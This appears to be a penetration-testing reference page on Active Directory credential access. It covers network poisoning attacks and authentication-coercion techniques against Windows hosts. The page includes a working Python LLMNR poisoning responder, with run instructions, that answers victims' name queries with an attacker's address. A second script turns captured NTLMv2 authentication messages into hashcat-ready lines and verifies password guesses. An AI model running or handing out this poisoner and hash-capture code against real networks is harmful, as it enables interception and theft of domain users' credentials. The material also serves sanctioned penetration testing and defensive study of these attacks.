Owlglass

Domain Credential Access

Clear-text credentials in the domain

Capture the hash

Network Attacks

  • ARP poisoning lets an attacker on the same layer-2 segment place themselves between the client and the server by answering ARP requests with their own MAC address. The success ratio depends on the network topology and hardening (Dynamic ARP Inspection, port security), and it can cause severe network disruptions if the attacker does not forward the intercepted traffic correctly.
  • DNS spoofing requires the attacker to become the clients' DNS server, typically by pushing a malicious DNS server address to them through ARP or DHCPv6 spoofing. The attacker then answers the clients' queries with their own address.
  • DHCP poisoning works by running a rogue DHCP server that injects a malicious WPAD URL (DHCP option 252) or DNS server address into the client's DHCP reply. The client's request for wpad.dat then goes to the attacker's web server, which answers with a request for authentication.
  • DHCPv6 spoofing is possible because Windows prefers IPv6 over IPv4 and DHCPv6 solicitations are sent to a multicast address, so any host on the segment can answer them, even on networks where IPv6 was never deployed. The attacker (e.g. with mitm6) hands the client a malicious configuration, including a DNS server address, and proceeds with DNS spoofing.
  • Link-Local Multicast Name Resolution (LLMNR), NetBIOS Name Service (NBT-NS), and Multicast DNS (mDNS) spoofing abuse the multicast and broadcast name resolution protocols used in Windows environments. When DNS resolution fails (a mistyped share name, a stale shortcut), these protocols are used as a fallback, and any host on the segment can answer. The attacker answers the query with their own address and then asks the connecting client to authenticate.
  • WSUS spoofing requires a man-in-the-middle position (for example via ARP poisoning) on clients that fetch updates over plain HTTP rather than HTTPS, plus a rogue WSUS server that deploys malicious updates to the clients.
  • ADIDNS poisoning is an attack on Active Directory-integrated DNS. By default, any authenticated user can create records in AD-integrated zones (through dynamic updates or directly over LDAP), so the attacker injects malicious records, for instance a wildcard (*) record, that point clients at the attacker's host.
  • WPAD spoofing abuses the feature that helps clients locate proxy configuration scripts (wpad.dat). Since the MS16-077 security update, clients no longer resolve the WPAD name through the multicast/broadcast fallbacks, so this attack is only possible through ADIDNS or DHCPv6 spoofing. Note that wpad is on the Windows DNS server's global query block list by default, which is why the wildcard record matters for the ADIDNS route.
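The LLMNR fallback described above, as an added example that is not from the original page or from any tool it mentions: a minimal LLMNR query parser and a poisoned responder in pure Python. The packet layout follows RFC 4795 (the DNS message format, without compression pointers); the hostnames, transaction ID and attacker address are constructed sample values. `serve()` joins the multicast group and answers live queries; the other functions can be exercised offline.

```python
#!/usr/bin/env python3
"""Minimal LLMNR (RFC 4795) query parser and poisoned responder.

Added example, not part of the original page. Windows sends an LLMNR query to
224.0.0.252:5355 when DNS cannot resolve a name; any host on the segment can
answer it. Names, IDs and addresses used here are constructed sample values.
"""
import socket
import struct
from dataclasses import dataclass

LLMNR_GROUP = "224.0.0.252"
LLMNR_PORT = 5355
QTYPE_A, QTYPE_ANY, QCLASS_IN = 1, 255, 1


def encode_name(name: str) -> bytes:
    """DNS label encoding: length-prefixed labels terminated by a zero byte."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def decode_name(data: bytes, offset: int):
    """Inverse of encode_name; LLMNR does not use DNS compression pointers."""
    labels = []
    while data[offset] != 0:
        length = data[offset]
        labels.append(data[offset + 1:offset + 1 + length].decode("ascii"))
        offset += 1 + length
    return ".".join(labels), offset + 1


@dataclass
class Query:
    txid: int
    name: str
    qtype: int
    qclass: int


def build_query(txid: int, name: str, qtype: int = QTYPE_A) -> bytes:
    """What a Windows client multicasts when DNS has no answer for `name`."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)  # flags=0: standard query
    return header + encode_name(name) + struct.pack("!HH", qtype, QCLASS_IN)


def parse_query(pkt: bytes):
    txid, flags, qdcount = struct.unpack("!HHH", pkt[:6])
    if flags & 0x8000 or qdcount != 1:  # QR bit set means response, not query
        return None
    name, off = decode_name(pkt, 12)
    qtype, qclass = struct.unpack("!HH", pkt[off:off + 4])
    return Query(txid, name, qtype, qclass)


def build_poisoned_answer(q: Query, attacker_ip: str, ttl: int = 30):
    """Claim that the queried name resolves to attacker_ip (what Responder does)."""
    if q.qtype not in (QTYPE_A, QTYPE_ANY) or q.qclass != QCLASS_IN:
        return None  # AAAA queries are ignored here; a real tool answers those too
    header = struct.pack("!HHHHHH", q.txid, 0x8000, 1, 1, 0, 0)  # QR=1, one answer
    question = encode_name(q.name) + struct.pack("!HH", q.qtype, q.qclass)
    rr = (encode_name(q.name) + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, 4)
          + socket.inet_aton(attacker_ip))
    return header + question + rr


def parse_answer(pkt: bytes):
    """Return (txid, name, ip) from an LLMNR A-record response, else None."""
    txid, flags, qdcount, ancount = struct.unpack("!HHHH", pkt[:8])
    if not flags & 0x8000 or ancount < 1:
        return None
    off = 12
    for _ in range(qdcount):  # skip the echoed question section
        _, off = decode_name(pkt, off)
        off += 4
    name, off = decode_name(pkt, off)
    rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
    if rtype != QTYPE_A or rclass != QCLASS_IN or rdlen != 4:
        return None
    return txid, name, socket.inet_ntoa(pkt[off + 10:off + 14])


def serve(attacker_ip: str):
    """Join the LLMNR group and answer every A/ANY query with our own address."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(("", LLMNR_PORT))
    mreq = socket.inet_aton(LLMNR_GROUP) + socket.inet_aton("0.0.0.0")
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
    while True:
        pkt, (src, sport) = sock.recvfrom(1024)
        q = parse_query(pkt)
        reply = build_poisoned_answer(q, attacker_ip) if q else None
        if reply:
            sock.sendto(reply, (src, sport))  # LLMNR responses are unicast to the querier
            print(f"poisoned {q.name!r} for {src}")


if __name__ == "__main__":
    import sys
    serve(sys.argv[1])
```

Run as `python3 llmnr_poison.py <attacker-ip>` on the target segment. When a client mistypes a share name and DNS fails, its multicast query is answered with the attacker's address and the SMB connection that follows lands on the attacker, where an SMB or HTTP listener such as Responder collects the NTLM exchange (that listener is not part of this block). On Linux, systemd-resolved may already hold port 5355 and must be stopped first.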

Forced authentication

  • Harvesting NetNTLM. If these name resolution protocols are disabled and MITM is not an option, there are still ways to force clients to authenticate to us. MDSec published research on this: certain file types placed on a writable share make Windows authenticate automatically and send an NTLM response to a remote machine as soon as Explorer renders the folder: SCF, URL, library-ms and searchConnector-ms. An important remark is that the attacker's machine must fall in the Local Intranet zone (reachable by a UNC path, with a hostname containing no dots); otherwise the client will not send credentials automatically. The research uses a WebDAV-enabled HTTP server to collect the hashes, called farmer, and the tool that creates the lure files is called crop.
  • MS-RPRN abuse (PrinterBug). With any domain user's credentials, the attacker calls the RpcRemoteFindFirstPrinterChangeNotificationEx method on the target's Print Spooler (reached over \pipe\spoolss) and makes the target's machine account authenticate over SMB to a host of the attacker's choosing. The Print Spooler service must be running on the target.
  • MS-EFSR abuse (PetitPotam). The Encrypting File System Remote (EFSR) protocol can be abused via a number of RPC calls, such as EfsRpcOpenFileRaw, to coerce Windows hosts into authenticating to an attacker-controlled machine. The interface is reachable through several SMB named pipes, including \pipe\lsarpc, \pipe\samr, \pipe\netlogon and \pipe\efsrpc. The original unauthenticated EfsRpcOpenFileRaw path was patched (CVE-2021-36942); other methods such as EfsRpcEncryptFileSrv still coerce authentication when called with domain credentials.
  • WebDAV Abuse
  • MS-FSRVP abuse (ShadowCoerce). Microsoft's File Server Remote VSS Protocol (MS-FSRVP) is used to create shadow copies on a remote file server. Two of its methods, IsPathSupported and IsPathShadowCopied, take a UNC path and can be used to coerce authentication; invocation goes through the \pipe\FssagentRpc SMB named pipe. The attack is not possible if the File Server VSS Agent Service is not enabled on the target machine. Also, patch KB5014692 prevents the coercion.
  • MS-DFSNM abuse (DFSCoerce). Like the other coercion methods, this one uses an RPC interface available through an SMB named pipe (\pipe\netdfs), here Microsoft's Distributed File System Namespace Management protocol. Filip Dragovic found two methods, NetrDfsAddStdRoot and NetrDfsRemoveStdRoot, that take a server name and can be used to force authentication. The DFS Namespace service is typically running on domain controllers, which makes them the usual target.
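Whichever coercion method above (or network attack in the previous section) triggers the connection, the listener ends up holding the server challenge it issued and the client's NTLMSSP AUTHENTICATE (Type 3) message. What it extracts is a NetNTLMv2 challenge-response, not the NT hash, so it has to be cracked or relayed. The following is an added example, not code from the original page or from Responder/farmer: it builds a constructed AUTHENTICATE message the way a coerced client would send one, parses it as a capture tool does, emits the hashcat mode 5600 line, and verifies a candidate NT hash against it. MD4 is implemented inline because OpenSSL 3 drops it from hashlib by default; the user name, domain, password, challenges and timestamp are constructed sample values.

```python
#!/usr/bin/env python3
"""Parse a captured NTLMSSP AUTHENTICATE message into a NetNTLMv2 hashcat line.

Added example, not from the original page. Everything (victim password,
challenges, names, timestamp) is constructed sample data.
"""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4; the NT hash is MD4(UTF-16LE(password))."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    rounds = ((F, 0, list(range(16)), (3, 7, 11, 19)),
              (G, 0x5A827999, [i % 4 * 4 + i // 4 for i in range(16)], (3, 5, 9, 13)),
              (H, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)))
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X, (aa, bb, cc, dd) = struct.unpack("<16I", msg[off:off + 64]), (a, b, c, d)
        for fn, k, order, shifts in rounds:
            for i in range(16):
                a = rotl((a + fn(b, c, d) + X[order[i]] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def ntowfv2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTLMv2 key: HMAC-MD5(NT hash, UPPER(user) + domain), strings in UTF-16LE."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def ntlmv2_response(nt_hash, user, domain, server_challenge, client_challenge, timestamp, av_pairs):
    """NtChallengeResponse = NTProofStr || temp (MS-NLMP 3.3.2); temp is the 'blob'."""
    temp = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp) + client_challenge
            + b"\x00" * 4 + av_pairs + b"\x00" * 4)
    proof = hmac.new(ntowfv2(nt_hash, user, domain), server_challenge + temp, hashlib.md5).digest()
    return proof + temp


def build_authenticate(user, domain, workstation, lm_resp, nt_resp, flags=0x00088205):
    """NTLMSSP AUTHENTICATE_MESSAGE without Version/MIC: fixed part is 64 bytes."""
    items = [lm_resp, nt_resp] + [s.encode("utf-16-le") for s in (domain, user, workstation)] + [b""]
    fields, payload = b"", b""
    for item in items:  # each field: Len, MaxLen, Offset from message start
        fields += struct.pack("<HHI", len(item), len(item), 64 + len(payload))
        payload += item
    return b"NTLMSSP\x00" + struct.pack("<I", 3) + fields + struct.pack("<I", flags) + payload


def parse_authenticate(msg: bytes) -> dict:
    """Pull the fields a capture tool needs out of a Type 3 message (offset-based, so Version/MIC do not matter)."""
    if msg[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", msg, 8)[0] != 3:
        raise ValueError("not an NTLMSSP AUTHENTICATE message")
    def field(i):
        length, _, offset = struct.unpack_from("<HHI", msg, 12 + 8 * i)
        return msg[offset:offset + length]
    flags = struct.unpack_from("<I", msg, 60)[0]
    enc = "utf-16-le" if flags & 0x1 else "latin-1"  # NTLMSSP_NEGOTIATE_UNICODE
    return {"lm": field(0), "nt": field(1), "domain": field(2).decode(enc),
            "user": field(3).decode(enc), "workstation": field(4).decode(enc)}


def to_hashcat_5600(auth: dict, server_challenge: bytes) -> str:
    nt = auth["nt"]
    if len(nt) <= 24:
        raise ValueError("24-byte response is NTLMv1 (hashcat mode 5500), not handled here")
    return f"{auth['user']}::{auth['domain']}:{server_challenge.hex()}:{nt[:16].hex()}:{nt[16:].hex()}"


def check_candidate(line: str, nt_hash: bytes) -> bool:
    """The per-guess work a cracker does: recompute NTProofStr and compare."""
    user, _, domain, challenge, proof, blob = line.split(":")
    expected = hmac.new(ntowfv2(nt_hash, user, domain), bytes.fromhex(challenge + blob), hashlib.md5).digest()
    return hmac.compare_digest(expected.hex(), proof)


def demo():
    """Constructed exchange: our listener issued the server challenge, the coerced client answered."""
    nt_hash = md4("Winter2024!".encode("utf-16-le"))  # constructed victim password
    server_challenge = bytes.fromhex("1122334455667788")
    dom = "LAB".encode("utf-16-le")
    av_pairs = struct.pack("<HH", 0x0002, len(dom)) + dom + struct.pack("<HH", 0, 0)  # NbDomainName, EOL
    nt_resp = ntlmv2_response(nt_hash, "jdoe", "LAB", server_challenge,
                              bytes.fromhex("aabbccddeeff0011"), 0x01DA5F2A3B4C5D6E, av_pairs)
    msg = build_authenticate("jdoe", "LAB", "WS01", b"\x00" * 24, nt_resp)
    return to_hashcat_5600(parse_authenticate(msg), server_challenge), nt_hash


if __name__ == "__main__":
    line, nt_hash = demo()
    print(line)
    print("candidate matches:", check_candidate(line, nt_hash))
```

Feed the printed line to `hashcat -m 5600`. `check_candidate()` is exactly the work a cracker repeats per guess, and it also shows why the captured value is useless for pass-the-hash: only an HMAC derived from the NT hash over the challenge is on the wire, never the NT hash itself, so the alternatives are cracking or relaying the live exchange.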

Kerberos

Automatic password management

NTDS Secrets

DCSync

DPAPI